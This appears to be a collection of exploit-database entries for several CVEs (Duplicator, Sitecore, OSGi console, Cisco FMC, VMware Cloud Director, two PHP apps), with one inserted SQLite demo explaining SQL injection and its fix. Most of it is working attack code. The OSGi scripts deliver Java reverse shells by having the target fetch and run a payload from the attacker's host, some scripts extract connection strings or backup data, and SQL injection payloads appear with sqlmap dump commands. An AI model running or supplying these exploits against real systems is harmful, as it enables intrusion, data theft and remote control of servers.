# CVE-Link : https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/

A severe vulnerability has been discovered in the directory /wordpress/wp-content/backups-dup-lite/tmp/. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but more critically, it provides unauthorized access to sensitive data within the database and all data inside. Exploiting this vulnerability poses an imminent threat, leading to potential brute force attacks on password hashes and, subsequently, the compromise of the entire system.

POC:
1) It is necessary that either the administrator or auto-backup works automatically at the scheduled time
2) Exploit will send file search requests every 5 seconds
3) I attack the site with this vulnerability using an exploit

The exploit sends a request to the server every 5 seconds along the path "http://your_site/wordpress/wp-content/backups-dup-lite/tmp/" and, if it finds something in the directory index, it instantly parses all the data and displays it on the screen.

Exploit (python3):

import requests
from bs4 import BeautifulSoup
import re
import time

url = "http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/"
processed_files = set()


def get_file_names(url):
    # Parse the directory listing and collect the linked file names
    response = requests.get(url)
    if response.status_code == 200 and len(response.text) > 0:
        soup = BeautifulSoup(response.text, 'html.parser')
        links = soup.find_all('a')
        file_names = []
        for link in links:
            file_name = link.get('href')
            if file_name != "../" and not file_name.startswith("?"):
                file_names.append(file_name)
        return file_names
    return []


def get_file_content(url, file_name):
    file_url = url + file_name
    if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE):
        print(f"Ignoring file: {file_name}")
        return None
    file_response = requests.get(file_url)
    if file_response.status_code == 200:
        return file_response.text
    return None


while True:
    file_names = get_file_names(url)
    if file_names:
        print("File names on the page:")
        for file_name in file_names:
            if file_name not in processed_files:
                print(file_name)
                file_content = get_file_content(url, file_name)
                if file_content is not None:
                    print("File content:")
                    print(file_content)
                processed_files.add(file_name)
    time.sleep(5)

--
With best regards,
Dmitrii Ignatyev, Penetration Tester
-
Sitecore - Remote Code Execution v8.2
#!/usr/bin/env python3
#
# Exploit Title: Sitecore - Remote Code Execution v8.2
# Exploit Author: abhishek morla
# Google Dork: N/A
# Date: 2024-01-08
# Vendor Homepage: https://www.sitecore.com/
# Software Link: https://dev.sitecore.net/
# Version: 10.3
# Tested on: windows64bit / Mozilla Firefox
# CVE : CVE-2023-35813
# The vulnerability impacts all Experience Platform topologies (XM, XP, XC) from 9.0 Initial Release to 10.3 Initial Release; 8.2 is also impacted
# Blog : https://medium.com/@abhishekmorla/uncovering-cve-2023-35813-retrieving-core-connection-strings-in-sitecore-5502148fce09
# Video POC : https://youtu.be/vWKl9wgdTB0

import argparse
import requests
from urllib.parse import quote
from rich.console import Console

console = Console()


def initial_test(hostname):
    # Initial payload to test vulnerability
    test_payload = '''
    <%@Register TagPrefix = 'x' Namespace = 'System.Runtime.Remoting.Services' Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' %>
    <x:RemotingService runat='server' Context-Response-ContentType='TestVulnerability' />
    '''
    encoded_payload = quote(test_payload)
    url = f"https://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload)
    response = requests.post(url, headers=headers, data=data, verify=False)

    # Check for the test string in the Content-Type of the response
    return 'TestVulnerability' in response.headers.get('Content-Type', '')


def get_payload(choice):
    # Payload templates for different options
    payloads = {
        '1': "<%$ ConnectionStrings:core %>",
        '2': "<%$ ConnectionStrings:master %>",
        '3': "<%$ ConnectionStrings:web %>"
    }
    base_payload = '''
    <%@Register TagPrefix = 'x' Namespace = 'System.Runtime.Remoting.Services' Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' %>
    <x:RemotingService runat='server' Context-Response-ContentType='{}' />
    '''
    return base_payload.format(payloads.get(choice, "Invalid"))


def main(hostname):
    if initial_test(hostname):
        print("Exploiting, Please wait...")
        console.print("[bold green]The target appears to be vulnerable. Proceed with payload selection.[/bold green]")
        print("Select the payload to use:")
        print("1: Core connection strings")
        print("2: Master connection strings")
        print("3: Web connection strings")
        payload_choice = input("Enter your choice (1, 2, or 3): ")
        payload = get_payload(payload_choice)
        encoded_payload = quote(payload)
        url = f"http://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index"
        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload)
        response = requests.post(url, headers=headers, data=data)
        # The expression binding is evaluated server-side and reflected in the Content-Type header
        if 'Content-Type' in response.headers:
            print("Content-Type from the response header:")
            print("\n")
            print(response.headers['Content-Type'])
        else:
            print("No Content-Type in the response header. Status Code:", response.status_code)
    else:
        print("The target does not appear to be vulnerable to CVE-2023-35813.")


if __name__ == "__main__":
    console.print("[bold green]Author: Abhishek Morla[/bold green]")
    console.print("[bold red]CVE-2023-35813[/bold red]")
    parser = argparse.ArgumentParser(description='Test for CVE-2023-35813 vulnerability in Sitecore')
    parser.add_argument('hostname', type=str, help='Hostname of the target Sitecore instance')
    args = parser.parse_args()
    main(args.hostname)
-
Human Resource Management System 1.0 - 'employeeid' SQL Injection
# Exploit Title: Human Resource Management System - SQL Injection
# Date: 13-01-2024
# Exploit Author: Srikar ( Exp1o1t9r )
# Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
# https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip
# Version: 1.0 (Monday, October 10, 2022 - 13:37)
# Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0

# Vulnerable URL and Parameter:
URL:
Parameter: employeeid=2

The following payloads successfully identified SQL injection vulnerabilities:

Boolean-based blind:
employeeid=2' AND 9667=9667-- NFMg

Error-based:
employeeid=2' AND (SELECT 6014 FROM(SELECT COUNT(*),CONCAT(0x716a767671,(SELECT (ELT(6014=6014,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ywfi

Time-based blind:
employeeid=2' AND (SELECT 7160 FROM (SELECT(SLEEP([SLEEPTIME])))IzXD)-- ninW

UNION query:
employeeid=-4254' UNION ALL SELECT NULL,CONCAT(0x716a767671,0x457977584e79636568687641497a4b6e637668455a487948534e50737753626f5a4a545244616276,0x7162716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

# Response:
MySQL: 10.4.32-MariaDB
Users: 'pma'@'localhost', 'root'@'127.0.0.1', 'root'@'::1', 'root'@'localhost'
-
OSGi v3.8-3.18 Console - RCE
```python
#!/usr/bin/python
# Exploit Title: [OSGi v3.8-3.18 Console RCE]
# Date: [2023-07-28]
# Exploit Author: [Andrzej Olchawa, Milenko Starcik,
#                  VisionSpace Technologies GmbH]
# Exploit Repository:
#   [https://github.com/visionspacetec/offsec-osgi-exploits.git]
# Vendor Homepage: [https://eclipse.dev/equinox]
# Software Link: [https://archive.eclipse.org/equinox/]
# Version: [3.8 - 3.18]
# Tested on: [Linux kali 6.3.0-kali1-amd64]
# License: [MIT]
#
# Usage:
#   python exploit.py --help
#
# Example:
#   python exploit.py --rhost=192.168.0.133 --rport=1337 --lhost=192.168.0.100 \
#       --lport=4444

"""
This is an exploit that opens a reverse shell connection from a system
running the OSGi (Equinox) console, versions 3.8 through 3.18.
"""

import argparse
import socket
import sys
import threading
from functools import partial
from http.server import BaseHTTPRequestHandler, HTTPServer

# Stage 1 of the telnet handshake (DO ECHO, DO SUPPRESS-GO-AHEAD, WILL NAWS,
# NAWS 116x55, WILL TERMINAL-TYPE)
HANDSHAKE_STAGE_1 = \
    b"\xff\xfd\x01\xff\xfd" \
    b"\x03\xff\xfb\x1f\xff" \
    b"\xfa\x1f\x00\x74\x00" \
    b"\x37\xff\xf0\xff\xfb" \
    b"\x18"

# Stage 2 of the telnet handshake (TERMINAL-TYPE IS "XTERM-256COLOR")
HANDSHAKE_STAGE_2 = \
    b"\xff\xfa\x18\x00\x58" \
    b"\x54\x45\x52\x4d\x2d" \
    b"\x32\x35\x36\x43\x4f" \
    b"\x4c\x4f\x52\xff\xf0"

# A buffer of this size is enough to handle the telnet handshake
BUFFER_SIZE = 2 * 1024


class HandlerClass(BaseHTTPRequestHandler):
    """
    This class overrides BaseHTTPRequestHandler. It provides the specific
    functionality used to deliver the payload to the target host.
    """
    _lhost: str
    _lport: int

    def __init__(self, lhost, lport, *args, **kwargs):
        self._lhost = lhost
        self._lport = lport
        super().__init__(*args, **kwargs)

    def _set_response(self):
        self.send_response(200)
        self.send_header("Content-type", "text/html")
        self.end_headers()

    def do_GET(self):  # pylint: disable=C0103
        """
        This method is responsible for the payload delivery. Raising
        KeyboardInterrupt here is what breaks the server out of
        serve_forever() once the target has fetched RevShell.java.
        """
        print("Delivering the payload...")
        self._set_response()
        self.wfile.write(generate_revshell_payload(
            self._lhost, self._lport).encode('utf-8'))
        raise KeyboardInterrupt

    def log_message(self, format, *args):  # pylint: disable=W0622
        """
        This method redefines a built-in method to suppress
        BaseHTTPRequestHandler log messages.
        """
        return


def generate_revshell_payload(lhost, lport):
    """
    This function generates the reverse shell payload (a single-file Java
    program, run directly with `java RevShell.java`) that will be executed
    on the target host.
    """
    payload = \
        "import java.io.IOException;import java.io.InputStream;" \
        "import java.io.OutputStream;import java.net.Socket;" \
        "class RevShell {public static void main(String[] args) " \
        "throws Exception { String host=\"%s\";int port=%d;" \
        "String cmd=\"sh\";Process p=new ProcessBuilder(cmd)." \
        "redirectErrorStream(true).start();Socket s=new Socket(host,port);" \
        "InputStream pi=p.getInputStream(),pe=p.getErrorStream(), " \
        "si=s.getInputStream();OutputStream po=p.getOutputStream()," \
        "so=s.getOutputStream();while(!s.isClosed()){while(pi.available()" \
        ">0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());" \
        "while(si.available()>0)po.write(si.read());so.flush();po.flush();" \
        "Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};" \
        "p.destroy();s.close();}}\n" % (lhost, lport)
    return payload


def run_payload_delivery(lhost, lport):
    """
    This function is responsible for payload delivery. It serves
    RevShell.java over HTTP on port 80 (needs root or CAP_NET_BIND_SERVICE).
    """
    print("Setting up the HTTP server for payload delivery...")
    handler_class = partial(HandlerClass, lhost, lport)
    server_address = ('', 80)
    httpd = HTTPServer(server_address, handler_class)
    try:
        print("[+] HTTP server is running.")
        httpd.serve_forever()
    except KeyboardInterrupt:
        print("[+] Payload delivered.")
    except Exception as err:  # pylint: disable=broad-except
        print("[-] Failed payload delivery!")
        print(err)
    finally:
        httpd.server_close()


def generate_stage_1(lhost):
    """
    This function generates stage 1 of the payload: an Equinox console
    `fork` command that makes the target download RevShell.java.
    """
    stage_1 = b"fork \"curl http://%s -o ./RevShell.java\"\n" % (
        lhost.encode()
    )
    return stage_1


def generate_stage_2():
    """
    This function generates stage 2 of the payload: a `fork` command that
    runs the downloaded Java source.
    """
    stage_2 = b"fork \"java ./RevShell.java\"\n"
    return stage_2


def establish_connection(rhost, rport):
    """
    This function creates a socket and establishes the connection
    to the target host.
    """
    print("[*] Connecting to OSGi Console...")
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((rhost, rport))
    print("[+] Connected.")
    return sock


def process_handshake(sock):
    """
    This function processes the telnet handshake with the target host.
    """
    print("[*] Processing the handshake...")
    sock.recv(BUFFER_SIZE)
    sock.send(HANDSHAKE_STAGE_1)
    sock.recv(BUFFER_SIZE)
    sock.send(HANDSHAKE_STAGE_2)
    sock.recv(BUFFER_SIZE)
    sock.recv(BUFFER_SIZE)


def deliver_payload(sock, lhost):
    """
    This function executes the first stage of the exploitation.
    It triggers the payload delivery mechanism on the target host.
    """
    stage_1 = generate_stage_1(lhost)
    print("[*] Triggering the payload delivery...")
    sock.send(stage_1)
    sock.recv(BUFFER_SIZE)
    sock.recv(BUFFER_SIZE)


def execute_payload(sock):
    """
    This function executes the second stage of the exploitation.
    It sends the payload which is responsible for code execution.
    """
    stage_2 = generate_stage_2()
    print("[*] Executing the payload...")
    sock.send(stage_2)
    sock.recv(BUFFER_SIZE)
    sock.recv(BUFFER_SIZE)
    print("[+] Payload executed.")


def exploit(args, thread):
    """
    This function sends the multi-staged payload to the target host.
    """
    try:
        sock = establish_connection(args.rhost, args.rport)
        process_handshake(sock)
        deliver_payload(sock, args.lhost)
        # Join the thread running the HTTP server
        # and wait for payload delivery
        thread.join()
        execute_payload(sock)
        sock.close()
        print("[+] Done.")
    except socket.error as err:
        print("[-] Could not connect!")
        print(err)
        sys.exit()


def parse():
    """
    This function is used to parse and return command-line arguments.
    --lhost and --lport are required: both stages depend on them.
    """
    parser = argparse.ArgumentParser(
        prog="OSGi-3.8-console-RCE",
        description="This tool will let you open a reverse shell from the "
                    "system that is running OSGi with the '-console' "
                    "option in versions between 3.8 and 3.18.",
        epilog="Happy Hacking! :)",
    )
    parser.add_argument("--rhost", dest="rhost", help="remote host",
                        type=str, required=True)
    parser.add_argument("--rport", dest="rport", help="remote port",
                        type=int, required=True)
    parser.add_argument("--lhost", dest="lhost", help="local host",
                        type=str, required=True)
    parser.add_argument("--lport", dest="lport", help="local port",
                        type=int, required=True)
    parser.add_argument("--version", action="version",
                        version="%(prog)s 0.1.0")
    return parser.parse_args()


def main(args):
    """
    Main function.
    """
    thread = threading.Thread(
        target=run_payload_delivery, args=(args.lhost, args.lport))
    thread.start()
    exploit(args, thread)


if __name__ == "__main__":
    main(parse())
```
-
Client Details System 1.0 - SQL Injection
+ **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1
+ **Date:** 2023-12-26
+ **Exploit Author:** Hamdi Sevben
+ **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/
+ **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip
+ **Version:** 1.0
+ **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53
+ **CVE:** CVE-2023-7137

## References:
+ **CVE-2023-7137:** https://vuldb.com/?id.249140
+ https://www.cve.org/CVERecord?id=CVE-2023-7137
+ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137
+ https://nvd.nist.gov/vuln/detail/CVE-2023-7137

## Description:
Client Details System 1.0 allows SQL Injection via the `uemail` parameter of the login form at "/clientdetails/". Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

## Proof of Concept:
+ Go to the User Login page: "http://localhost/clientdetails/"
+ Fill in an email and password.
+ Intercept the request via Burp Suite and send it to Repeater.
+ Copy and paste the request into a file named "r.txt".
+ Captured Burp request:
```
POST /clientdetails/ HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 317
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/clientdetails/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36

uemail=user@mail.com&login=LOG+IN&password=P@ass123
```
+ Use sqlmap to exploit. In sqlmap, use the `uemail` parameter to dump the database.
```
python sqlmap.py -r r.txt -p uemail --risk 3 --level 5 --threads 1 --random-agent --tamper=between,randomcase --proxy="http://127.0.0.1:8080" --dbms mysql --batch --current-db
```
```
---
Parameter: uemail (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: uemail=user@mail.com' OR NOT 6660=6660-- FlRf&login=LOG IN&password=P@ass123

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: uemail=user@mail.com' AND (SELECT 6854 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6854=6854,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Oxlo&login=LOG IN&password=P@ass123

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uemail=user@mail.com' AND (SELECT 5335 FROM (SELECT(SLEEP(5)))qsPA)-- pwtE&login=LOG IN&password=P@ass123

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: uemail=user@mail.com' UNION ALL SELECT NULL,CONCAT(0x717a717a71,0x45575259495444506f48756469467471555975554d6f794d77677a4f50547145735052567278434f,0x7176627871),NULL,NULL,NULL,NULL,NULL-- -&login=LOG IN&password=P@ass123
---
[14:58:11] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.53, PHP, PHP 8.1.6
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[14:58:11] [INFO] fetching current database
current database: 'loginsystem'
```
+ current database: `loginsystem`
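Both the HRM `employeeid` finding and this `uemail` finding rest on the same thing: user input is spliced into the text of a `WHERE` clause, so a single quote ends the string and the rest of the payload becomes SQL. The block below is an added example and is not code from either advisory or from either application: it models the two injectable queries against an in-memory SQLite database with constructed tables and rows, runs the page's boolean-based, UNION-based and login-bypass payloads against them, and shows the bound-parameter fix. The MySQL-only payloads (`SLEEP`, the `FLOOR(RAND(0)*2)` error trick) are not modelled. The marker strings `qjvvq`/`qbqkq` are the ASCII form of the `0x716a767671`/`0x7162716b71` constants in the HRM UNION payload; sqlmap searches the HTTP response for whatever lands between them.

```python
# Added example, not from either advisory: a small model of the injectable
# WHERE clauses behind the HRM "employeeid" and Client Details "uemail"
# findings, run against an in-memory SQLite database built here. The table
# names and rows are constructed for the demo. MySQL-only payloads from the
# advisories (SLEEP, the FLOOR(RAND(0)*2) error trick) are not modelled.
import sqlite3

SCHEMA = """
CREATE TABLE employees (employeeid INTEGER, name TEXT, salary INTEGER);
INSERT INTO employees VALUES (1, 'alice', 5000), (2, 'bob', 6000);
CREATE TABLE users (id INTEGER, uemail TEXT, password TEXT);
INSERT INTO users VALUES (1, 'user@mail.com', 'P@ass123');
"""

# sqlmap's markers from the HRM advisory: 0x716a767671 and 0x7162716b71 are
# just the ASCII strings below; it searches the response for text between them.
MARK_L, MARK_R = "qjvvq", "qbqkq"


def fresh_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_lookup(con, employeeid):
    """String-built query, as in the vulnerable application."""
    sql = ("SELECT employeeid, name, salary FROM employees "
           f"WHERE employeeid = '{employeeid}'")
    return con.execute(sql).fetchall()


def safe_lookup(con, employeeid):
    """The fix: bind the value, so quotes and comments stay inside the data."""
    sql = "SELECT employeeid, name, salary FROM employees WHERE employeeid = ?"
    return con.execute(sql, (employeeid,)).fetchall()


def vulnerable_login(con, uemail, password):
    """String-built login check; '-- ' comments the password test away."""
    sql = (f"SELECT id, uemail FROM users WHERE uemail = '{uemail}' "
           f"AND password = '{password}'")
    return con.execute(sql).fetchall()


def boolean_oracle(con):
    """Boolean-based blind: the true and false variants of the HRM payload
    give different results, which is the whole signal sqlmap works from."""
    true_rows = vulnerable_lookup(con, "2' AND 9667=9667-- NFMg")
    false_rows = vulnerable_lookup(con, "2' AND 9667=9668-- NFMg")
    return len(true_rows), len(false_rows)


def union_extract(con):
    """UNION-based: put a chosen value between the markers and pull it out
    of the rows the application returns (here: the engine version)."""
    payload = ("-4254' UNION ALL SELECT NULL,'" + MARK_L +
               "'||sqlite_version()||'" + MARK_R + "',NULL-- -")
    for row in vulnerable_lookup(con, payload):
        for cell in row:
            if isinstance(cell, str) and cell.startswith(MARK_L) \
                    and cell.endswith(MARK_R):
                return cell[len(MARK_L):-len(MARK_R)]
    return None


def db_version(con):
    """Reference value for union_extract(), read the legitimate way."""
    return con.execute("SELECT sqlite_version()").fetchone()[0]


if __name__ == "__main__":
    con = fresh_db()
    print("boolean oracle (true, false):", boolean_oracle(con))
    print("union extract:", union_extract(con), "==", db_version(con))
    print("login bypass:", vulnerable_login(
        con, "user@mail.com' OR NOT 6660=6660-- FlRf", "wrong"))
    print("bound parameter:", safe_lookup(con, "2' AND 9667=9667-- NFMg"))
```

The last line is the check worth remembering: the same `2' AND 9667=9667-- NFMg` string passed through a bound parameter matches nothing, because the driver never lets it become SQL. The `-- ` terminator needs the trailing space in MySQL, which is why sqlmap appends junk like `NFMg` after it.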
-
OSGi v3.7.2 (and below) Console - RCE
```python
#!/usr/bin/python
# Exploit Title: [OSGi v3.7.2 Console RCE]
# Date: [2023-07-28]
# Exploit Author: [Andrzej Olchawa, Milenko Starcik,
#                  VisionSpace Technologies GmbH]
# Exploit Repository:
#   [https://github.com/visionspacetec/offsec-osgi-exploits.git]
# Vendor Homepage: [https://eclipse.dev/equinox]
# Software Link: [https://archive.eclipse.org/equinox/]
# Version: [3.7.2 and before]
# Tested on: [Linux kali 6.3.0-kali1-amd64]
# License: [MIT]
#
# Usage:
#   python exploit.py --help
#
# Examples:
#   python exploit.py --rhost=localhost --rport=1337 --lhost=localhost \
#       --lport=4444
#
#   python exploit.py --rhost=localhost --rport=1337 --payload= \
#       "curl http://192.168.100.100/osgi_test"

"""
This is an exploit that opens a reverse shell connection from a system
running the OSGi (Equinox) console, version 3.7.2 or earlier.
"""

import argparse
import base64
import socket


def parse():
    """
    This function is used to parse and return command-line arguments.
    """
    parser = argparse.ArgumentParser(
        prog="OSGi-3.7.2-console-RCE",
        description="This tool will let you open a reverse shell from the "
                    "system that is running OSGi with the '-console' "
                    "option in version 3.7.2 (or before).",
        epilog="Happy Hacking! :)",
    )
    parser.add_argument("--rhost", dest="rhost", help="remote host",
                        type=str, required=True)
    parser.add_argument("--rport", dest="rport", help="remote port",
                        type=int, required=True)
    parser.add_argument("--lhost", dest="lhost", help="local host",
                        type=str, required=False)
    parser.add_argument("--lport", dest="lport", help="local port",
                        type=int, required=False)
    parser.add_argument("--payload", dest="custom_payload",
                        help="custom payload", type=str, required=False)
    parser.add_argument("--version", action="version",
                        version="%(prog)s 0.1.0")
    args = parser.parse_args()
    # Exactly one of the two modes must be selected: a custom payload, or a
    # reverse shell to --lhost/--lport.
    if args.custom_payload and (args.lhost or args.lport):
        parser.error(
            "either --payload or both --lhost and --lport are required.")
    if not args.custom_payload and not (args.lhost and args.lport):
        parser.error(
            "either --payload or both --lhost and --lport are required.")
    return args


def generate_payload(lhost, lport, custom_payload):
    """
    This function generates the whole payload ready for delivery: the
    command is base64-encoded and spliced into a bash pipeline written with
    brace expansion ({echo,...}) so it contains no spaces or quotes, then
    wrapped in the console's `fork` command.
    """
    payload = ""
    if custom_payload:
        payload = custom_payload
        print("(*) Using custom payload.")
    elif lhost and lport:
        payload = \
            "echo 'import java.io.IOException;import java.io.InputStream;" \
            "import java.io.OutputStream;import java.net.Socket;class Rev" \
            "Shell {public static void main(String[] args) throws Excepti" \
            "on { String host=\"%s\";int port=%s;String cmd=\"sh\";Proces" \
            "s p=new ProcessBuilder(cmd).redirectErrorStream(true).start(" \
            ");Socket s=new Socket(host,port);InputStream pi=p.getInputSt" \
            "ream(),pe=p.getErrorStream(), si=s.getInputStream();OutputSt" \
            "ream po=p.getOutputStream(), so=s.getOutputStream();while(!s" \
            ".isClosed()){while(pi.available()>0)so.write(pi.read());whil" \
            "e(pe.available()>0)so.write(pe.read());while(si.available()>" \
            "0)po.write(si.read());so.flush();po.flush();Thread.sleep(50)" \
            ";try {p.exitValue();break;}catch (Exception e){}};p.destroy(" \
            ");s.close();}}' > RevShell.java ; java ./RevShell.java" % (
                lhost, lport)
        print("(+) Using Java reverse shell payload.")
    bash_payload = b"bash -c {echo,%s}|{base64,-d}|{bash,-i}" % (
        base64.b64encode(payload.encode()))
    wrapped_payload = b"fork \"%s\"\n" % (bash_payload)
    return wrapped_payload


def deliver_payload(rhost, rport, payload):
    """
    This function connects to the target host and delivers the payload.
    It returns True if successful; False otherwise.
    """
    print("(*) Sending payload...")
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((rhost, rport))
        sock.send(payload)
        sock.close()
    except socket.error as err:
        print(f"(-) Could not deliver the payload to {rhost}:{rport}!")
        print(err)
        return False
    return True


def main(args):
    """
    Main function.
    """
    payload = generate_payload(args.lhost, args.lport, args.custom_payload)
    success = deliver_payload(args.rhost, args.rport, payload)
    if success:
        print("(+) Done.")
    else:
        print("(-) Finished with errors.")


if __name__ == "__main__":
    main(parse())
```
-
Cisco Firepower Management Center < 6.6.7.1 - Authenticated RCE
```python
# Exploit Title: [Cisco Firepower Management Center]
# Google Dork: [non]
# Date: [12/06/2023]
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
# Version: [6.2.3.18, 6.4.0.16, 6.6.7.1]
# CVE : [CVE-2023-20048]

import sys

import requests
import urllib3

# Certificate verification is disabled below; silence the resulting warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Set the variables for the URL, username, and password for the FMC web
# services interface (the issue is authenticated: valid FMC credentials are
# required)
fmc_url = "https://fmc.example.com"
fmc_user = "admin"
fmc_pass = "cisco123"

# Create a requests session to handle cookies and certificate verification
session = requests.Session()
session.verify = False

# Send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint
# to get the access token and refresh token
token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken"
response = session.post(token_url, auth=(fmc_user, fmc_pass))

# Check the response status and extract the access token and refresh token
# from the response headers, then send the access token back as the
# X-auth-access-token header on subsequent requests (the original script put
# it in an Authorization header, which the FMC REST API does not read)
try:
    if response.status_code == 200:
        access_token = response.headers["X-auth-access-token"]
        refresh_token = response.headers["X-auth-refresh-token"]
        session.headers["X-auth-access-token"] = access_token
    else:
        print("Failed to get tokens, status code: " + str(response.status_code))
        sys.exit(1)
except Exception as e:
    print(e)
    sys.exit(1)

# Set the variable for the domain id; change this to your domain id
domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f"

# Send a GET request to the
# /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to
# get the list of devices managed by FMC
devices_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords"
response = session.get(devices_url)

# Check the response status and extract the data as a json object
try:
    if response.status_code == 200:
        data = response.json()
    else:
        print("Failed to get devices, status code: " + str(response.status_code))
        sys.exit(1)
except Exception as e:
    print(e)
    sys.exit(1)

# Parse the data to get the list of device names and URLs
devices = []
for item in data["items"]:
    device_name = item["name"]
    device_url = item["links"]["self"]
    devices.append((device_name, device_url))

# Loop through the list of devices and send a GET request to the URL of each
# device to get the device details
for device in devices:
    device_name, device_url = device
    response = session.get(device_url)

    # Check the response status and extract the data as a json object
    try:
        if response.status_code == 200:
            data = response.json()
        else:
            print("Failed to get device details, status code: " + str(response.status_code))
            continue
    except Exception as e:
        print(e)
        continue

    # Parse the data to get the device type, software version, and
    # configuration URL
    device_type = data["type"]
    device_version = data["metadata"]["softwareVersion"]
    config_url = data["metadata"]["configURL"]

    # Check if the device type is FTD and the software version is vulnerable
    # to CVE-2023-20048; use the values from the affected products section
    # in the security advisory
    if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]:
        print("Device " + device_name + " is vulnerable to CVE-2023-20048")

        # Create a list of commands that you want to execute on the device
        commands = ["show version", "show running-config", "show interfaces"]
        device_id = device_url.split("/")[-1]

        # Loop through the list of commands and send a POST request to the
        # /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND}
        # endpoint to execute each command on the device
        for command in commands:
            command_url = (fmc_url + "/api/fmc_config/v1/domain/" + domain_id +
                           "/devices/devicerecords/" + device_id +
                           "/operational/command/" + command)
            response = session.post(command_url)

            # Check the response status and extract the data as a json object
            try:
                if response.status_code == 200:
                    data = response.json()
                else:
                    print("Failed to execute command, status code: " + str(response.status_code))
                    continue
            except Exception as e:
                print(e)
                continue

            # Parse the data to get the result of the command execution and
            # print it
            result = data["result"]
            print("Command: " + command)
            print("Result: " + result)
    else:
        print("Device " + device_name + " is not vulnerable to CVE-2023-20048")
```
-
VMware Cloud Director 10.5 - Bypass identity verification
```python
# Exploit Title: [VMware Cloud Director | Bypass identity verification]
# Google Dork: [non]
# Date: [12/06/2023]
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
# Version: [10.5]
# CVE : [CVE-2023-34060]

import argparse
import socket
import threading

import paramiko
import requests


# Define a function to check if a port is open
def is_port_open(ip, port):
    # Create a socket object
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Set the timeout to 1 second
    s.settimeout(1)
    # Try to connect to the port
    try:
        s.connect((ip, port))
        # The port is open
        return True
    except OSError:
        # The port is closed (or filtered)
        return False
    finally:
        # Close the socket
        s.close()


# Define a function to exploit a vulnerable device
def exploit_device(ip, port, username, password, command):
    # Create a ssh client object
    client = paramiko.SSHClient()
    # Set the policy to accept any host key
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    # Connect to the target with the supplied credentials (the -u/-w
    # arguments; the original script ignored them and always used root/vmware)
    client.connect(ip, port, username, password,
                   allow_agent=False, look_for_keys=False)
    # Execute the command and get the output
    stdin, stdout, stderr = client.exec_command(command)
    # Print the output
    print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}")
    # Close the ssh connection
    client.close()


